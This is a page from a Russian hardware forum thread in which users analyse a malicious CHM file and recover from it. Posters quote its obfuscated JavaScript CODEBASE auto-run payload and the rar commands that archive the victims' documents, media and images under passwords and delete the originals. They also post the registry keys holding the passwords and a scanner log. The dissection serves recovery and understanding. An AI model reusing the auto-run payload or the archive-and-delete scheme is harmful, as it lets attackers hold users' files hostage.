Часовой пояс: UTC + 3 часа




Начать новую тему Новая тема / Ответить на тему Ответить  Сообщений: 77 • Страница 2 из 4<  1  2  3  4  >
  Версия для печати (полностью) Пред. тема | След. тема 
В случае проблем с отображением форума, отключите блокировщик рекламы
Автор Сообщение
 

Member
Статус: Не в сети
Регистрация: 18.11.2002
Откуда: не вернуться
QNX писал(а):
это не вирус

Это вирус (троян точнее) причём давольно популярный (Sasser) и антивирусники его хапают только так...

banifatich
Если это полностью текст батников то либо там стоит ещё что-то, либо ничего он не архивирует и rar.exe (как и lsass.exe) там только для вида, а файлы сливаются в один и без спец-софта запаришься потом их извлекать (проще пиво от водки отделить)

_________________
Летели гуси-лебеди, а им навстречу - воробьи-пингвины и соловьи-страусы...



Партнер
 

Advanced member
Статус: Не в сети
Регистрация: 01.03.2003
virus

это не он и ты не думаешь, что под таким именем можно скомпилить любую прогу для любых целей?


 

Member
Статус: Не в сети
Регистрация: 18.11.2002
Откуда: не вернуться
Я это прекрасно знаю, более того я знаю что тот кто это прислал почти так и сделал
(т.е это не Sasser в чистом виде) но в основу лёг именно троян и это я могу гарантировать...

(вирус HeatPC помнишь ? точно такая же фишка сделанная точно таким де путём)

_________________
Летели гуси-лебеди, а им навстречу - воробьи-пингвины и соловьи-страусы...


 

Member
Статус: Не в сети
Регистрация: 08.05.2005
Откуда: Новосибирск
потерпевшим меня назвали! я не потерпевший, только из любопытства это г скачал, чтобы всем рассказать...
меня больше интересует были ли еще такие случаи сообщений от этого "маньяка"?

_________________
"опыт-единственный способ познания" (Л.Да-винчи)


 

Member
Статус: Не в сети
Регистрация: 31.03.2005
Откуда: То там, то сям.
virus писал(а):
Если это полностью текст батников то либо там стоит ещё что-то, либо ничего он не архивирует и rar.exe (как и lsass.exe) там только для вида, а файлы сливаются в один..

А ты не допускаешь такого случая, что из lsass.exe вызывается выполнение rar.exe с опциями архивирования с паролем тех самых %temp%\dvr\mtml32.ini и т.д.? Когда файлы уже в один слиты.
Допустим там ничего не архивируется...
virus писал(а):
без спец-софта запаришься потом их извлекать (проще пиво от водки отделить)

Какой, блин, спец-софт? Это всё WinHEX' ом или HEXWorkshop'ом делается. Открываешь в хексовщике файл, и рубаешь на отдельные. Главное различить начало одного и конец другого, но это можно по заголовкам файлов сделать.
Знаток, ё моё!
DENLaDEN писал(а):
потерпевшим меня назвали

Ну, извини, СЧАСТЛИВЧИК. :) Зачем тогда ветку сделал?

_________________
Относительность относительна.
"Сами Вы, сэр, - осётр!" (с) -=КД=- http://dedov.clan.su


 

Member
Статус: Не в сети
Регистрация: 18.11.2002
Откуда: не вернуться
banifatich писал(а):
Главное различить начало одного и конец другого

Если бы он ложил mp3 в один файл а doc в другой то труда это не составило бы
banifatich писал(а):
А ты не допускаешь такого случая, что из lsass.exe вызывается выполнение rar.exe

Допускаю именно по этому и написал
virus писал(а):
либо там стоит ещё что-то

_________________
Летели гуси-лебеди, а им навстречу - воробьи-пингвины и соловьи-страусы...


 

Member
Статус: Не в сети
Регистрация: 31.03.2005
Откуда: То там, то сям.
virus писал(а):
Если бы он ложил mp3 в один файл а doc в другой то труда это не составило бы

Да причём тут это. Судя по скрипту(bat файлу), сначала сливаются файлы с одним расширением, а потом в этот же целевой файл, сливаются файлы с другим расширением. Открываешь любой файл, по типу потерянного в хексовщике, и смотришь первые байты. Для *.mp3 это будет - 49 44 33. Для *.doc - D0 CF 11. Это и есть почти заголовок файла. Затем ищешь эту комбинацию в том самом %temp%\dvr\mtml32.ini - вот начало одного из файлов и режешь по нему. И т.д.
Добавлено спустя 3 минуты, 35 секунд
Подтверждаю слова QNX - это не вирус и не троян. Это скорее "почтовая бомба". :) Милая вещица, для тренировки ума.

_________________
Относительность относительна.
"Сами Вы, сэр, - осётр!" (с) -=КД=- http://dedov.clan.su


 

Member
Статус: Не в сети
Регистрация: 03.08.2005
И я заражен, вот как нехорошо. Мой каспер долго ищет что-то... Есть алтернатива антивирусу, чтоб быстрее?


 

Member
Статус: Не в сети
Регистрация: 31.03.2005
Откуда: То там, то сям.
QNX :beer: ну, тогда пущай как я говорил, режет хексовщиком. Так и восстановит. Если ещё не поздно, и %temp% не почистил. :D Блин, во марОки ему будет. :)

_________________
Относительность относительна.
"Сами Вы, сэр, - осётр!" (с) -=КД=- http://dedov.clan.su


 

Member
Статус: Не в сети
Регистрация: 03.08.2005
Что мне делать? объясните на пальцах!


 

Member
Статус: Не в сети
Регистрация: 31.03.2005
Откуда: То там, то сям.
Drager ветку читать. :)

_________________
Относительность относительна.
"Сами Вы, сэр, - осётр!" (с) -=КД=- http://dedov.clan.su


 

Member
Статус: Не в сети
Регистрация: 18.11.2002
Откуда: не вернуться
Не знаю как вам, а мне касперыч сказал так...
Цитата:
Scanned file: friend.chm
friend.bin/#IDXHDR - OK
friend.bin/#STRINGS - OK
friend.bin/#SYSTEM - OK
friend.bin/#TOPICS - OK
friend.bin/#URLSTR - OK
friend.bin/#URLTBL - OK
friend.bin/$OBJINST - OK
friend.bin/$WWAssociativeLinks/Property - OK
friend.bin/$WWKeywordLinks/Property - OK
friend.bin/ready/fall05.exe/lsass.exe - infected by Trojan.Win32.VB.aga
friend.bin/ready/fall05.exe/1.bat - OK
friend.bin/ready/fall05.exe/2.bat - OK
friend.bin/ready/fall05.exe/3.bat - OK
friend.bin/ready/fall05.exe/4.bat - OK
friend.bin/ready/fall05.exe/5.bat - OK
friend.bin/ready/fall05.exe/Rar.exe - OK
friend.bin/ready/index.htm Suspicion: Exploit.HTML.CodeBaseExec

_________________
Летели гуси-лебеди, а им навстречу - воробьи-пингвины и соловьи-страусы...


 

Member
Статус: Не в сети
Регистрация: 24.04.2005
Откуда: Белгород :(
эх вы знатоки , значит так , при запуске friend.chm происходит :
1 открывается фаил index.html
Цитата:
Hello!
<script language="javascript"> document.write('<OBJECT NAME="X' + '" CLASS' + 'ID="CLSI' + 'D:11111' + '111-111' + '1-1111' + '-1111-11' + '111111' + '1123" CODE' + 'BASE=' + '"fall' + '05.exe" wid' + 'th=1 heigh' + 't=1>');
</script>

Ты видишь в окне просмотра только Hello! , а ещё запускается фаил fall05.exe
2 fall05.exe = это самораспаковывающийся архив
содержит фаилы :
1.bat - 5.bat - скрипты
rar.exe - консольный рар
lsas.exe - первый раз в жизни соглашусь с qnx :) , lsas.exe это не вирус , он запускает rar.exe
сначала запускаются фаилы от 1.bat до 5.bat , они не скидывают все фаилы в один, как полагалось некоторыми авторитетами , которые не знают ни команд dos ни могут посмотреть dir -? , оттуда бы они узнали что с помошью ключей /s /b /a просто скидывают списки фаилов в один.

1.bat в mtxoc32.ini - фаилы с расширениями doc , xls , rtf , mdb , xml , nfo , txt.
2.bat в mtml32.ini - htm , html , css , php , php , cgi.
3.bat в emsxpm32.ini - mp3.
4.bat в ottor32.ini - jpg , pdf , lnk.
5.bat в nvxow32.ini - psd.

после этого запускается lsas , он запускает rar.exe с параметрами :
Код:
a
stertd.rar
-df
-ep2
-hp3,78355186944842E+18
-p3,78355186944842E+18
-tl
-y
-inul
-idp
@mtxoc32.ini
a
abery2.rar
-df
-ep2
-hp-3,03506065330114E+32
-p-3,03506065330114E+32
-tl
-y
-inul
-idp
@mtml32.ini
a
vuentu.rar
-df
-ep2
-hp2,21739596759373E+34
-p2,21739596759373E+34
-tl
-y
-inul
-idp
@emsxpm32.ini
a
menait.rar
-df
-ep2
-hp-2,21739596759373E+34
-p-2,21739596759373E+34
-tl
-y
-inul
-idp
@ottor32.ini
a
mech4e.rar
-df
-ep2
-hp1,62031886613828E+36
-p1,62031886613828E+36
-tl
-y
-inul
-idp
@nvxow32.ini


-df (фаилы после архивации удаляются) -ep2(сохрянять пути) -hp (зашифровать) -p(print file to stdout) -tl(поставиить время архива как последнего фаила) -y (да на все вопроссы) -inul (отключить сообщения) -idp (отключить отображение процентов)

Пострадавшим : наити фаилы
stertd.rar , abery2.rar , vuentu.rar , menait.rar , mech4e.rar и попробовать пароли которые после -hp

Мудистр твоя прожка вызвала только смех и сочувствие

Virus это не вирус совершенно ,мудистр слишком тупой, ты попробуй запусти вылезет окно следушего содержания :
#77
только запускай в отдельной папке тогда точно ничего не грозит

пароль чтобы остановить счетчик : $23#7L@:8$g%f27N8)4g*f78T^vg4_f=v7+D6v&32(vDf$65QvfC[7bv7645b+f76;v76

Я искрене надеюсь что fin и другие участники конференции изменят своё отношение ко мне

_________________
█ ██ █ ██ █ ██ █


 

Member
Статус: Не в сети
Регистрация: 31.03.2005
Откуда: То там, то сям.
HAZARDOUS Ну чё ты сразу наезжаешь. Ну ступил я по-поводу /sba. Но ведь по
banifatich писал(а):
А ты не допускаешь такого случая, что из lsass.exe вызывается выполнение rar.exe с опциями архивирования с паролем тех самых temp%\dvr\mtml32.ini и т.д.?
- я правильно предполагал. Я только предположения делал, думал QNX уже этим занимается. Поэтому даже декомпилить не стал. А вообще, МАЛАДЭЦ! :applause:


 

Member
Статус: Не в сети
Регистрация: 03.06.2004
Откуда: из кондитерской
Магистр просил запостить.

Цитата:
Запостите в той ветке, пожалуйста, кто-нибудь, что эти пароли - это ТОЛЬКО его пароли.

Неужели вы думаете, что я один пароль на всех буду использовать? Какой смысл тогда этой диверсии?

Пароль основан на случайных числах. Паролем является, допустим, сумма чисел = A+B+C. Для возможности восстановления, эти числа записываются в реестр. Для получения пароля, достаточно посмотреть в определенную ветку реестра, взять значения тех ключей и восстановить. Допустим, если А=1, В=2 и С=3, то паролем будет "6".

Пароли, полученные Хазардосом, - это только его пароли. При повторном запуске программы, в реестр записываются уже другие числа, и пароль на архивы восстановить нельзя будет, кроме как брутфорсом.

Зато сколько гонора у него: "Мудистр твоя прожка вызвала только смех и сочувствие"

_________________
Сделаю конфетку из чего угодно.


 

Member
Статус: Не в сети
Регистрация: 08.05.2005
Откуда: Новосибирск
banifatich как зачем ветку создавал??? ведь весело! столько споров, рассуждений а на файло мне пофиг! у меня на том жестком, на котором я этот лохотрон запускал ничего толкового нет. да и не одной пропажи я пока не обнаружил. а вои решешения для действительно пострадавших по их наивности уже я вижу отискали! а значит ветка не бесполезная! 8)))

а Hello эт конечно сильно! браво! ну кто дадумается читать продолжение тупого анекдота ввиде скомпилированого файла справки?!!! да еще и с таким весом! туда бы война и мир влезла бы... кстати если ктонибудь знает продолжение напишите плизззз! а то интересно всеж 8))))

_________________
"опыт-единственный способ познания" (Л.Да-винчи)


 

Member
Статус: Не в сети
Регистрация: 24.04.2005
Откуда: Белгород :(
А пиндец не доглядел просто на скорую руку прожку написал
Код:
var m : array [1..100] of string;
i: integer;
f : text;
begin
for i:=1 to paramcount do
m[i]:=paramstr(i);
assign(f , 'd:\1.txt');
for i:=1 to paramcount do
begin
append(f);
writeln(f , paramstr(i));
close(f);
end;
end.

Чтоб посмареть какие параметры передаются. И не думал что магистр так поступит. Ну тогда значит вот
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\zipasswd
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\rapasswd
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\acpasswd
здесь смотрим
Кстати для школьного уровня неплохо на васике кодишь

_________________
█ ██ █ ██ █ ██ █


 

Member
Статус: Не в сети
Регистрация: 24.04.2005
Откуда: Белгород :(
ищи себя в высказываниях чайников :)
DENLaDEN писал(а):
я не программист поэтому не судите

DENLaDEN писал(а):
короче пугалка получилась убедительная для наивных лохов

по словам этого кретина мудистра если бы админисрация выполнила их дебильные требования (какие они такие и требования) они бы дали всем прожку которая читает в реестре пароль извлекает архив , это не развод

_________________
█ ██ █ ██ █ ██ █


 

Member
Статус: Не в сети
Регистрация: 08.05.2005
Откуда: Новосибирск
HAZARDOUS я вот хоть убей ни одного архива не вижу! где их искать то???

_________________
"опыт-единственный способ познания" (Л.Да-винчи)


 

Member
Статус: Не в сети
Регистрация: 24.04.2005
Откуда: Белгород :(
DENLaDEN поиском stertd.rar , abery2.rar , vuentu.rar , menait.rar , mech4e.rar

_________________
█ ██ █ ██ █ ██ █


Показать сообщения за:  Поле сортировки  
Начать новую тему Новая тема / Ответить на тему Ответить  Сообщений: 77 • Страница 2 из 4<  1  2  3  4  >
-

Часовой пояс: UTC + 3 часа


Кто сейчас на конференции

Сейчас этот форум просматривают: нет зарегистрированных пользователей и гости: 20


Вы не можете начинать темы
Вы не можете отвечать на сообщения
Вы не можете редактировать свои сообщения
Вы не можете удалять свои сообщения
Вы не можете добавлять вложения

Перейти:  
Создано на основе phpBB® Forum Software © phpBB Group
Русская поддержка phpBB | Kolobok smiles © Aiwan